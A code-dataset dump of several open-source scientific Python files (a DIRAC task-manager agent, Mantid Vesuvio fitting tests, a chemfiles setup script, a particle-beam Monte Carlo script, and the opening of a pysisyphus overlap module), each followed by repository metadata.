In case you want to further extend it you are required to follow the note on the
initialize method and on the _getClients method.
"""
__RCSID__ = "$Id$"
import time
import datetime
from Queue import Queue
from DIRAC import S_OK, gMonitor
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.Core.Utilities.ThreadPool import ThreadPool
from DIRAC.Core.Utilities.ThreadSafe import Synchronizer
from DIRAC.TransformationSystem.Client.FileReport import FileReport
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.TransformationSystem.Client.TaskManager import WorkflowTasks
from DIRAC.TransformationSystem.Client.TransformationClient import TransformationClient
from DIRAC.TransformationSystem.Agent.TransformationAgentsUtilities import TransformationAgentsUtilities
AGENT_NAME = 'Transformation/TaskManagerAgentBase'
gSynchro = Synchronizer()
class TaskManagerAgentBase( AgentModule, TransformationAgentsUtilities ):
""" To be extended. Please look at WorkflowTaskAgent and RequestTaskAgent.
"""
def __init__( self, *args, **kwargs ):
""" c'tor
Always call this in the extension agent
"""
AgentModule.__init__( self, *args, **kwargs )
TransformationAgentsUtilities.__init__( self )
self.transClient = None
self.transType = []
self.tasksPerLoop = 50
self.owner = ''
self.ownerGroup = ''
self.ownerDN = ''
# for the threading
self.transQueue = Queue()
self.transInQueue = []
self.transInThread = {}
#############################################################################
def initialize( self ):
""" Agent initialization.
The extensions MUST provide in the initialize method the following data members:
- TransformationClient objects (self.transClient),
- set the shifterProxy if different from the default one set here ('ProductionManager')
- list of transformation types to be looked (self.transType)
"""
gMonitor.registerActivity( "SubmittedTasks", "Automatically submitted tasks", "Transformation Monitoring", "Tasks",
gMonitor.OP_ACUM )
# Default clients
self.transClient = TransformationClient()
#setting up the threading
maxNumberOfThreads = self.am_getOption( 'maxNumberOfThreads', 15 )
threadPool = ThreadPool( maxNumberOfThreads, maxNumberOfThreads )
self.log.verbose( "Multithreaded with %d threads" % maxNumberOfThreads )
for i in xrange( maxNumberOfThreads ):
threadPool.generateJobAndQueueIt( self._execute, [i] )
return S_OK()
def finalize( self ):
""" graceful finalization
"""
if self.transInQueue:
self._logInfo( "Wait for threads to get empty before terminating the agent (%d tasks)" % len( self.transInThread ) )
self.transInQueue = []
while self.transInThread:
time.sleep( 2 )
self.log.info( "Threads are empty, terminating the agent..." )
return S_OK()
#############################################################################
def execute( self ):
""" The TaskManagerBase execution method is just filling the Queues of transformations that need to be processed
"""
operationsOnTransformationDict = {}
# Determine whether the task status is to be monitored and updated
enableTaskMonitor = self.am_getOption( 'MonitorTasks', '' )
if not enableTaskMonitor:
self.log.verbose( "Monitoring of tasks is disabled. To enable it, create the 'MonitorTasks' option" )
else:
# Get the transformations for which the tasks have to be updated
status = self.am_getOption( 'UpdateTasksStatus', ['Active', 'Completing', 'Stopped'] )
transformations = self._selectTransformations( transType = self.transType, status = status, agentType = [] )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['updateTaskStatus']}
# Determine whether the task files status is to be monitored and updated
enableFileMonitor = self.am_getOption( 'MonitorFiles', '' )
if not enableFileMonitor:
self.log.verbose( "Monitoring of files is disabled. To enable it, create the 'MonitorFiles' option" )
else:
# Get the transformations for which the files have to be updated
status = self.am_getOption( 'UpdateFilesStatus', ['Active', 'Completing', 'Stopped'] )
transformations = self._selectTransformations( transType = self.transType, status = status, agentType = [] )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
if transID in operationsOnTransformationDict:
operationsOnTransformationDict[transID]['Operations'].append('updateFileStatus')
else:
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['updateFileStatus']}
# Determine whether the checking of reserved tasks is to be performed
enableCheckReserved = self.am_getOption( 'CheckReserved', '' )
if not enableCheckReserved:
self.log.verbose( "Checking of reserved tasks is disabled. To enable it, create the 'CheckReserved' option" )
else:
# Get the transformations for which the check of reserved tasks have to be performed
status = self.am_getOption( 'CheckReservedStatus', ['Active', 'Completing', 'Stopped'] )
transformations = self._selectTransformations( transType = self.transType, status = status, agentType = [] )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
if transID in operationsOnTransformationDict:
operationsOnTransformationDict[transID]['Operations'].append( 'checkReservedTasks' )
else:
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['checkReservedTasks']}
# Determine whether the submission of tasks is to be performed
enableSubmission = self.am_getOption( 'SubmitTasks', '' )
if not enableSubmission:
self.log.verbose( "Submission of tasks is disabled. To enable it, create the 'SubmitTasks' option" )
else:
# getting the credentials for submission
res = getProxyInfo( False, False )
if not res['OK']:
self.log.error( "Failed to determine credentials for submission", res['Message'] )
return res
proxyInfo = res['Value']
self.owner = proxyInfo['username']
self.ownerGroup = proxyInfo['group']
self.ownerDN = proxyInfo['identity']
self.log.info( "Tasks will be submitted with the credentials %s:%s" % ( self.owner, self.ownerGroup ) )
# Get the transformations for which the check of reserved tasks have to be performed
status = self.am_getOption( 'SubmitStatus', ['Active', 'Completing'] )
transformations = self._selectTransformations( transType = self.transType, status = status )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
# Get the transformations which should be submitted
self.tasksPerLoop = self.am_getOption( 'TasksPerLoop', self.tasksPerLoop )
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
if transID in operationsOnTransformationDict:
operationsOnTransformationDict[transID]['Operations'].append( 'submitTasks' )
else:
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['submitTasks']}
self._fillTheQueue( operationsOnTransformationDict )
return S_OK()
def _selectTransformations( self, transType = [], status = ['Active', 'Completing'], agentType = ['Automatic'] ):
""" get the transformations
"""
selectCond = {}
if status:
selectCond['Status'] = status
if transType:
selectCond['Type'] = transType
if agentType:
selectCond['AgentType'] = agentType
res = self.transClient.getTransformations( condDict = selectCond )
if not res['OK']:
self.log.error( "Failed to get transformations: %s" % res['Message'] )
elif not res['Value']:
self.log.verbose( "No transformations found" )
else:
self.log.verbose( "Obtained %d transformations" % len( res['Value'] ) )
return res
def _fillTheQueue( self, operationsOnTransformationsDict ):
""" Just fill the queue with the operation to be done on a certain transformation
"""
count = 0
for transID, bodyAndOps in operationsOnTransformationsDict.iteritems():
if transID not in self.transInQueue:
count += 1
self.transInQueue.append( transID )
self.transQueue.put( {transID: bodyAndOps} )
self.log.info( "Out of %d transformations, %d put in thread queue" % ( len( operationsOnTransformationsDict ),
count ) )
#############################################################################
def _getClients( self ):
""" returns the clients used in the threads - this is another function that should be extended.
The clients provided here are defaults, and should be adapted
"""
threadTransformationClient = TransformationClient()
threadTaskManager = WorkflowTasks() # this is for wms tasks, replace it with something else if needed
return {'TransformationClient': threadTransformationClient,
'TaskManager': threadTaskManager}
def _execute( self, threadID ):
""" This is what runs inside the threads, in practice this is the function that does the real stuff
"""
# Each thread will have its own clients
clients = self._getClients()
while True:
transIDOPBody = self.transQueue.get()
try:
transID = transIDOPBody.keys()[0]
operations = transIDOPBody[transID]['Operations']
if transID not in self.transInQueue:
self._logWarn( "Got a transf not in transInQueue...?", method = '_execute', transID = transID )
break
self.transInThread[transID] = ' [Thread%d] [%s] ' % ( threadID, str( transID ) )
for operation in operations:
self._logInfo( "Starting processing operation %s" % operation, method = '_execute', transID = transID )
startTime = datetime.datetime.utcnow()
res = getattr( self, operation )( transIDOPBody, clients )
if not res['OK']:
self._logError( "Failed to %s: %s" % ( operation, res['Message'] ), method = '_execute', transID = transID )
self._logInfo( "Processed operation %s" % operation, method = '_execute', transID = transID )
except Exception, x:
self._logException( '%s' % x, transID = transID )
finally:
if not transID:
transID = 'None'
self._logInfo( "Processed transformation in %s" % ( datetime.datetime.utcnow() - startTime ),
method = '_execute', transID = transID )
self._logVerbose( "%d transformations still in queue" % ( len( self.transInQueue ) - 1 ),
method = '_execute', transID = transID )
self.transInThread.pop( transID, None )
if transID in self.transInQueue:
self.transInQueue.remove( transID )
self._logDebug( "transInQueue = %s" % str( self.transInQueue ), method = '_execute', transID = transID )
#############################################################################
# real operations done
def updateTaskStatus( self, transIDOPBody, clients ):
""" Updates the task status
"""
transID = transIDOPBody.keys()[0]
# Get the tasks which are in an UPDATE state
updateStatus = self.am_getOption( 'TaskUpdateStatus', ['Checking', 'Deleted', 'Killed', 'Staging', 'Stalled',
'Matched', 'Scheduled', 'Rescheduled', 'Completed',
'Submitted', 'Assigned', 'Received',
'Waiting', 'Running'] )
condDict = {"TransformationID":transID, "ExternalStatus":updateStatus}
timeStamp = str( datetime.datetime.utcnow() - datetime.timedelta( minutes = 10 ) )
transformationTasks = clients['TransformationClient'].getTransformationTasks( condDict = condDict,
older = timeStamp,
timeStamp = 'LastUpdateTime' )
self._logDebug( "getTransformationTasks(%s) return value: %s" % ( str( condDict ), str( transformationTasks ) ),
method = 'updateTaskStatus', transID = transID )
if not transformationTasks['OK']:
self._logError( "Failed to get tasks to update: %s" % transformationTasks['Message'],
method = "updateTaskStatus", transID = transID )
return transformationTasks
if not transformationTasks['Value']:
self._logVerbose( "No tasks found to update", method = "updateTaskStatus", transID = transID )
return transformationTasks
self._logVerbose( "Getting %d tasks status" % len( transformationTasks['Value'] ),
method = "updateTaskStatus", transID = transID )
submittedTaskStatus = clients['TaskManager'].getSubmittedTaskStatus( transformationTasks['Value'] )
self._logDebug( "getSubmittedTaskStatus return value: %s" % str( submittedTaskStatus ),
method = 'updateTaskStatus', transID = transID )
if not submittedTaskStatus['OK']:
self._logError( "Failed to get updated task states: %s" % submittedTaskStatus['Message'],
method = "updateTaskStatus", transID = transID )
return submittedTaskStatus
statusDict = submittedTaskStatus['Value']
if not statusDict:
self._logInfo( "No tasks to update", method = "updateTaskStatus", transID = transID )
return submittedTaskStatus
else:
for status in sorted( statusDict ):
taskIDs = statusDict[status]
self._logInfo( "Updating %d task(s) to %s" % ( len( taskIDs ), status ),
method = "updateTaskStatus", transID = transID )
setTaskStatus = clients['TransformationClient'].setTaskStatus( transID, taskIDs, status )
self._logDebug( "setTaskStatus return value: %s" % str( setTaskStatus ),
method = 'updateTaskStatus', transID = transID )
if not setTaskStatus['OK']:
self._logError( "Failed to update task status for transformation: %s" % setTaskStatus['Message'],
method = "updateTaskStatus", transID = transID )
return setTaskStatus
return S_OK()
def updateFileStatus( self, transIDOPBody, clients ):
""" Update the files status
"""
transID = transIDOPBody.keys()[0]
timeStamp = str( datetime.datetime.utcnow() - datetime.timedelta( minutes = 10 ) )
condDict = {'TransformationID' : transID, 'Status' : ['Assigned']}
transformationFiles = clients['TransformationClient'].getTransformationFiles( condDict = condDict,
older = timeStamp, timeStamp = 'LastUpdate' )
self._logDebug( "getTransformationFiles(%s) return value: %s" % ( str( condDict ), transformationFiles ),
method = 'updateFileStatus', transID = transID )
if not transformationFiles['OK']:
self._logError( "Failed to get transformation files to update: %s" % transformationFiles['Message'],
method = 'updateFileStatus' )
return transformationFiles
if not transformationFiles['Value']:
self._logInfo( "No files to be updated", transID = transID, method = 'updateFileStatus' )
return transformationFiles
submittedFileStatus = clients['TaskManager'].getSubmittedFileStatus( transformationFiles['Value'] )
self._logDebug( "getSubmittedFileStatus return value: %s" % submittedFileStatus,
method = 'updateFileStatus', transID = transID )
if not submittedFileStatus['OK']:
self._logError( "Failed to get updated file states for transformation: %s" % submittedFileStatus['Message'],
transID = transID, method = 'updateFileStatus' )
return submittedFileStatus
statusDict = submittedFileStatus['Value']
if not statusDict:
self._logInfo( "No file states to be updated", transID = transID, method = 'updateFileStatus' )
return submittedFileStatus
fileReport = FileReport( server = clients['TransformationClient'].getServer() )
for lfn, status in statusDict.items():
setFileStatus = fileReport.setFileStatus( transID, lfn, status )
if not setFileStatus['OK']:
return setFileStatus
commit = fileReport.commit()
if not commit['OK']:
self._logError( "Failed to update file states for transformation: %s" % commit['Message'],
transID = transID, method = 'updateFileStatus' )
return commit
else:
self._logInfo( "Updated the states of %d files" % len( commit['Value'] ),
transID = transID, method = 'updateFileStatus' )
return S_OK()
def checkReservedTasks( self, transIDOPBody, clients ):
""" Checking Reserved tasks
"""
transID = transIDOPBody.keys()[0]
# Select the tasks which have been in Reserved status for more than 1 hour for selected transformations
condDict = {"TransformationID":transID, "ExternalStatus":'Reserved'}
time_stamp_older = str( datetime.datetime.utcnow() - datetime.timedelta( hours = 1 ) )
time_stamp_newer = str( datetime.datetime.utcnow() - datetime.timedelta( days = 7 ) )
res = clients['TransformationClient'].getTransformationTasks( condDict = condDict, older = time_stamp_older,
newer = time_stamp_newer )
self._logDebug( "getTransformationTasks(%s) return value: %s" % ( condDict, res ),
method = 'checkReservedTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to get Reserved tasks: %s" % res['Message'],
transID = transID, method = 'checkReservedTasks' )
return res
if not res['Value']:
self._logVerbose( "No Reserved tasks found", transID = transID )
return res
reservedTasks = res['Value']
res = clients['TaskManager'].updateTransformationReservedTasks( reservedTasks )
self._logDebug( "updateTransformationReservedTasks(%s) return value: %s" % ( reservedTasks, res ),
method = 'checkReservedTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to update transformation reserved tasks: %s" % res['Message'],
transID = transID, method = 'checkReservedTasks' )
return res
noTasks = res['Value']['NoTasks']
taskNameIDs = res['Value']['TaskNameIDs']
# For the tasks with no associated request found re-set the status of the task in the transformationDB
for taskName in noTasks:
transID, taskID = taskName.split( '_' )
self._logInfo( "Resetting status of %s to Created as no associated task found" % ( taskName ),
transID = transID, method = 'checkReservedTasks' )
res = clients['TransformationClient'].setTaskStatus( int( transID ), int( taskID ), 'Created' )
if not res['OK']:
self._logError( "Failed to update task status and ID after recovery: %s %s" % ( taskName, res['Message'] ),
transID = transID, method = 'checkReservedTasks' )
return res
# For the tasks for which an associated request was found update the task details in the transformationDB
for taskName, extTaskID in taskNameIDs.items():
transID, taskID = taskName.split( '_' )
self._logInfo( "Setting status of %s to Submitted with ID %s" % ( taskName, extTaskID ),
transID = transID, method = 'checkReservedTasks' )
setTaskStatusAndWmsID = clients['TransformationClient'].setTaskStatusAndWmsID( int( transID ), int( taskID ),
'Submitted', str( extTaskID ) )
if not setTaskStatusAndWmsID['OK']:
self._logError( "Failed to update task status and ID after recovery: %s %s" % ( taskName,
setTaskStatusAndWmsID['Message'] ),
transID = transID, method = 'checkReservedTasks' )
return setTaskStatusAndWmsID
return S_OK()
def submitTasks( self, transIDOPBody, clients ):
""" Submit the tasks to an external system, using the taskManager provided
"""
transID = transIDOPBody.keys()[0]
transBody = transIDOPBody[transID]['Body']
tasksToSubmit = clients['TransformationClient'].getTasksToSubmit( transID, self.tasksPerLoop )
self._logDebug( "getTasksToSubmit(%s, %s) return value: %s" % ( transID, self.tasksPerLoop, tasksToSubmit ),
method = 'submitTasks', transID = transID )
if not tasksToSubmit['OK']:
self._logError( "Failed to obtain tasks: %s" % tasksToSubmit['Message'], transID = transID, method = 'submitTasks' )
return tasksToSubmit
tasks = tasksToSubmit['Value']['JobDictionary']
if not tasks:
self._logVerbose( "No tasks found for submission", transID = transID, method = 'submitTasks' )
return tasksToSubmit
self._logInfo( "Obtained %d tasks for submission" % len( tasks ), transID = transID, method = 'submitTasks' )
preparedTransformationTasks = clients['TaskManager'].prepareTransformationTasks( transBody, tasks,
self.owner, self.ownerGroup, self.ownerDN )
self._logDebug( "prepareTransformationTasks return value: %s" % preparedTransformationTasks,
method = 'submitTasks', transID = transID )
if not preparedTransformationTasks['OK']:
self._logError( "Failed to prepare tasks: %s" % preparedTransformationTasks['Message'],
transID = transID, method = 'submitTasks' )
return preparedTransformationTasks
res = self.__actualSubmit( preparedTransformationTasks, clients, transID )
res = clients['TaskManager'].updateDBAfterTaskSubmission( res['Value'] )
self._logDebug( "updateDBAfterTaskSubmission return value: %s" % res, method = 'submitTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to update DB after task submission: %s" % res['Message'],
transID = transID, method = 'submitTasks' )
return res
return S_OK()
# This gSynchro is necessary in order to avoid race conditions when submitting to the WMS,
# because WMSClient wants jobDescription.xml to be present in the local directory prior to submission
@gSynchro
def __actualSubmit( self, preparedTransformationTasks, clients, transID ):
""" This function contacts either RMS or WMS depending on the type of transformation.
"""
res = clients['TaskManager'].submitTransformationTasks( preparedTransformationTasks['Value'] )
self._logDebug( "submitTransformationTasks return value: %s" % res, method = 'submitTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to submit prepared tasks: %s" % res['Message'],
transID = transID, method = 'submitTasks' )
return res
|
Sbalbp/DIRAC
|
TransformationSystem/Agent/TaskManagerAgentBase.py
|
Python
|
gpl-3.0
| 25,297
|
[
"DIRAC"
] |
cbb5a3871b8ef20b3b2151c0aa98e74660626cd1739c1d0e2140b04d7c119510
|
# pylint: disable=no-init
"""These are more integration tests as they will require that the test data is available
and that mantid can be imported
"""
import stresstesting
import platform
import numpy as np
from mantid.api import (WorkspaceGroup, MatrixWorkspace)
from mantid.simpleapi import *
from vesuvio.commands import fit_tof
# =====================================Helper Function=================================
def _is_old_boost_version():
# It appears that a difference in boost version is causing different
# random number generation. As such an OS check is used.
# Older boost (earlier than 56): Ubuntu 14.04, RHEL7
dist = platform.linux_distribution()
if any(dist):
if 'Red Hat' in dist[0] and dist[1].startswith('7'):
return True
if dist[0] == 'Ubuntu' and dist[1] == '14.04':
return True
return False
def _create_test_flags(background, multivariate=False):
flags = dict()
flags['fit_mode'] = 'spectrum'
flags['spectra'] = '135'
if multivariate:
mass1 = {'value': 1.0079, 'function': 'MultivariateGaussian', 'SigmaX': 5, 'SigmaY': 5, 'SigmaZ': 5}
else:
mass1 = {'value': 1.0079, 'function': 'GramCharlier', 'width': [2, 5, 7],
'hermite_coeffs': [1, 0, 0], 'k_free': 0, 'sears_flag': 1}
mass2 = {'value': 16.0, 'function': 'Gaussian', 'width': 10}
mass3 = {'value': 27.0, 'function': 'Gaussian', 'width': 13}
mass4 = {'value': 133.0, 'function': 'Gaussian', 'width': 30}
flags['masses'] = [mass1, mass2, mass3, mass4]
flags['intensity_constraints'] = [0, 1, 0, -4]
if background:
flags['background'] = {'function': 'Polynomial', 'order': 3}
else:
flags['background'] = None
flags['ip_file'] = 'Vesuvio_IP_file_test.par'
flags['diff_mode'] = 'single'
flags['gamma_correct'] = True
flags['ms_flags'] = dict()
flags['ms_flags']['SampleWidth'] = 10.0
flags['ms_flags']['SampleHeight'] = 10.0
flags['ms_flags']['SampleDepth'] = 0.5
flags['ms_flags']['SampleDensity'] = 241
flags['fit_minimizer'] = 'Levenberg-Marquardt,AbsError=1e-08,RelError=1e-08'
return flags
def _equal_within_tolerance(self, expected, actual, tolerance=0.05):
"""
Checks the expected value is equal to the actual value with in a percentage of tolerance
"""
tolerance_value = expected * tolerance
abs_difference = abs(expected - actual)
self.assertTrue(abs_difference <= abs(tolerance_value))
def _get_peak_height_and_index(workspace, ws_index):
"""
returns the maximum height in y of a given spectrum of a workspace
workspace is assumed to be a matrix workspace
"""
y_data = workspace.readY(ws_index)
peak_height = np.amax(y_data)
peak_bin = np.argmax(y_data)
return peak_height, peak_bin
# ====================================================================================
class FitSingleSpectrumNoBackgroundTest(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=False)
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
self.assertEqual(4, len(self._fit_results))
fitted_wsg = self._fit_results[0]
self.assertTrue(isinstance(fitted_wsg, WorkspaceGroup))
self.assertEqual(1, len(fitted_wsg))
fitted_ws = fitted_wsg[0]
self.assertTrue(isinstance(fitted_ws, MatrixWorkspace))
self.assertEqual(7, fitted_ws.getNumberHistograms())
self.assertAlmostEqual(50.0, fitted_ws.readX(0)[0])
self.assertAlmostEqual(562.0, fitted_ws.readX(0)[-1])
index_one_first = -0.013011414483
index_one_last = 0.00720741862173
index_two_first = 1.12713408816e-05
index_two_last = 6.90222280789e-05
if _is_old_boost_version():
index_one_first = 0.000631295911554
_equal_within_tolerance(self, index_one_first, fitted_ws.readY(0)[0])
_equal_within_tolerance(self, index_one_last, fitted_ws.readY(0)[-1])
_equal_within_tolerance(self, index_two_first, fitted_ws.readY(1)[0])
_equal_within_tolerance(self, index_two_last, fitted_ws.readY(1)[-1])
fitted_params = self._fit_results[1]
self.assertTrue(isinstance(fitted_params, MatrixWorkspace))
self.assertEqual(14, fitted_params.getNumberHistograms())
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(1, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
class FitSingleSpectrumBivariateGaussianTiesTest(stresstesting.MantidStressTest):
"""
Test ensures that internal ties for mass profiles work correctly
This test ties SigmaX to SigmaY making the multivariate gaussian
a Bivariate Gaussian
"""
def excludeInPullRequests(self):
return True
def runTest(self):
flags = _create_test_flags(background=False, multivariate=True)
flags['masses'][0]['ties'] = 'SigmaX=SigmaY'
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
# Get fit workspace
fit_params = mtd['15039-15045_params_iteration_1']
f0_sigma_x = fit_params.readY(2)[0]
f0_sigma_y = fit_params.readY(3)[0]
self.assertAlmostEqual(f0_sigma_x, f0_sigma_y)
# ====================================================================================
class SingleSpectrumBackground(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=True)
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
self.assertEqual(4, len(self._fit_results))
fitted_wsg = self._fit_results[0]
self.assertTrue(isinstance(fitted_wsg, WorkspaceGroup))
self.assertEqual(1, len(fitted_wsg))
fitted_ws = fitted_wsg[0]
self.assertTrue(isinstance(fitted_ws, MatrixWorkspace))
self.assertEqual(8, fitted_ws.getNumberHistograms())
self.assertAlmostEqual(50.0, fitted_ws.readX(0)[0])
self.assertAlmostEqual(562.0, fitted_ws.readX(0)[-1])
index_one_first = -0.00553133541138
index_one_last = 0.00722053823154
calc_data_height_expected = 0.13302098172
calc_data_bin_expected = 635
if _is_old_boost_version():
index_one_first = 0.000605572768745
_equal_within_tolerance(self, index_one_first, fitted_ws.readY(0)[0])
_equal_within_tolerance(self, index_one_last, fitted_ws.readY(0)[-1])
calc_data_height_actual, calc_data_bin_actual = _get_peak_height_and_index(fitted_ws, 1)
_equal_within_tolerance(self, calc_data_height_expected, calc_data_height_actual)
self.assertTrue(abs(calc_data_bin_expected - calc_data_bin_actual) <= 1)
fitted_params = self._fit_results[1]
self.assertTrue(isinstance(fitted_params, MatrixWorkspace))
self.assertEqual(18, fitted_params.getNumberHistograms())
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(1, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
class BankByBankForwardSpectraNoBackground(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=False)
flags['fit_mode'] = 'bank'
flags['spectra'] = 'forward'
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
self.assertEquals(4, len(self._fit_results))
fitted_banks = self._fit_results[0]
self.assertTrue(isinstance(fitted_banks, WorkspaceGroup))
self.assertEqual(8, len(fitted_banks))
bank1 = fitted_banks[0]
self.assertTrue(isinstance(bank1, MatrixWorkspace))
self.assertAlmostEqual(50.0, bank1.readX(0)[0])
self.assertAlmostEqual(562.0, bank1.readX(0)[-1])
_equal_within_tolerance(self, 8.23840378769e-05, bank1.readY(1)[0])
_equal_within_tolerance(self, 0.000556695665501, bank1.readY(1)[-1])
bank8 = fitted_banks[7]
self.assertTrue(isinstance(bank8, MatrixWorkspace))
self.assertAlmostEqual(50.0, bank8.readX(0)[0])
self.assertAlmostEqual(562.0, bank8.readX(0)[-1])
_equal_within_tolerance(self, 0.00025454613205, bank8.readY(1)[0])
_equal_within_tolerance(self, 0.00050412575393, bank8.readY(1)[-1])
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(8, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
class SpectraBySpectraForwardSpectraNoBackground(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=False)
flags['fit_mode'] = 'spectra'
flags['spectra'] = '143-144'
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
self.assertEquals(4, len(self._fit_results))
fitted_spec = self._fit_results[0]
self.assertTrue(isinstance(fitted_spec, WorkspaceGroup))
self.assertEqual(2, len(fitted_spec))
spec143 = fitted_spec[0]
self.assertTrue(isinstance(spec143, MatrixWorkspace))
self.assertAlmostEqual(50.0, spec143.readX(0)[0])
self.assertAlmostEqual(562.0, spec143.readX(0)[-1])
_equal_within_tolerance(self, 2.27289862507e-06, spec143.readY(1)[0])
_equal_within_tolerance(self, 3.49287467421e-05, spec143.readY(1)[-1])
spec144 = fitted_spec[1]
self.assertTrue(isinstance(spec144, MatrixWorkspace))
self.assertAlmostEqual(50.0, spec144.readX(0)[0])
self.assertAlmostEqual(562.0, spec144.readX(0)[-1])
_equal_within_tolerance(self, 5.9811662524e-06, spec144.readY(1)[0])
_equal_within_tolerance(self, 4.7479831769e-05, spec144.readY(1)[-1])
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(2, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
|
dymkowsk/mantid
|
Testing/SystemTests/tests/analysis/VesuvioCommandsTest.py
|
Python
|
gpl-3.0
| 11,168
|
[
"Gaussian"
] |
82d2e3a57939a4b1423b578ed8bb11447b1938f4ecc8b717dc2d89478c512353
|
# -*- coding=utf-8 -*-
from wheel.bdist_wheel import bdist_wheel
from skbuild import setup
import sys
import os
import re
# Read the version from chemfiles/__init__.py without importing chemfiles
__version__ = re.search(
r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]', open("chemfiles/__init__.py").read()
).group(1)
class universal_wheel(bdist_wheel):
# Workaround until https://github.com/pypa/wheel/issues/185 is resolved
def get_tag(self):
tag = bdist_wheel.get_tag(self)
return ("py2.py3", "none") + tag[2:]
install_requires = ["numpy"]
if sys.hexversion < 0x03040000:
install_requires.append("enum34")
# scikit-build options
cmake_args = []
if sys.platform.startswith("darwin"):
cmake_args.append("-DCMAKE_OSX_DEPLOYMENT_TARGET:STRING=10.9")
if os.getenv("CHFL_PY_INTERNAL_CHEMFILES"):
cmake_args.append("-DCHFL_PY_INTERNAL_CHEMFILES=ON")
def _get_lib_ext():
if sys.platform.startswith("win32"):
ext = ".dll"
elif sys.platform.startswith("darwin"):
ext = ".dylib"
elif sys.platform.startswith("linux"):
ext = ".so"
else:
raise Exception("Unknown operating system: %s" % sys.platform)
return ext
setup(
version=__version__,
install_requires=install_requires,
cmdclass={"bdist_wheel": universal_wheel},
cmake_args=cmake_args,
packages=["chemfiles"],
package_data={
"chemfiles": [
"*" + _get_lib_ext(),
"bin/*" + _get_lib_ext(),
]
},
exclude_package_data={
"chemfiles": [
"include/*",
]
},
)
|
Luthaf/Chemharp-python
|
setup.py
|
Python
|
mpl-2.0
| 1,599
|
[
"Chemfiles"
] |
2a60e5fd562ab3054f42a87e64668809e5d92de9f928877532358b6a6c022f7a
|
#!/usr/bin/env python3
import json
import random
import const
from const import MM, MEV
from particle import Particle
from detector import Detector
from initial import Beam, Profile, Energy
random.seed(91400)
N = 1000
# Define the beam parameters
beam = Beam(
# Initial position is in a centered uniform disc with 50 mm diameter
profile=Profile(
centre=0,
diameter=50*MM,
shape=const.UNIFORM,
),
# Energy has a Gaussian distribution with a mean of 25 MeV and a
# standard deviation of 5 MeV
energy=Energy(
mean=25*MEV,
width=5*MEV,
shape=const.GAUSSIAN
),
# Initial direction is in a cone between 0 and 30 degrees
divergence=30
)
# Define the detector
detector = Detector(
voxels=5,
size=100*MM
)
for _ in range(N):
# Generate a new particle from the beam
particle = Particle(beam)
# We keep tracking as long as we have energy left and the particle
# is within the detector.
while particle.energy > 0 and detector.voxel(particle.position):
particle.propagate(detector)
result = detector.dump()
with open('energy-deposit.json', 'w') as outfile:
outfile.write(json.dumps(result))
|
DanielBrookRoberge/MonteCarloExamples
|
particle-beam/particle-beam.py
|
Python
|
mpl-2.0
| 1,211
|
[
"Gaussian"
] |
3c7ae57affd91c9b8d40e1b59f479a82f06721655880f468edcabd08fdfaf557
|
from collections import OrderedDict
import itertools
import logging
from pathlib import Path
import shutil
import subprocess
import tempfile
import numpy as np
import pyparsing as pp
from pysisyphus.config import Config
from pysisyphus.helpers_pure import chunks
CIOVL="""mix_aoovl=ao_ovl
a_mo=mos.1
b_mo=mos.2
ncore={ncore}
a_det=dets.1
b_det=dets.2
a_mo_read=2
b_mo_read=2
"""
CIOVL_NO_SAO="""ao_read=-1
same_aos=.true.
a_mo=mos.1
b_mo=mos.2
ncore={ncore}
a_det=dets.1
b_det=dets.2
a_mo_read=2
b_mo_read=2"""
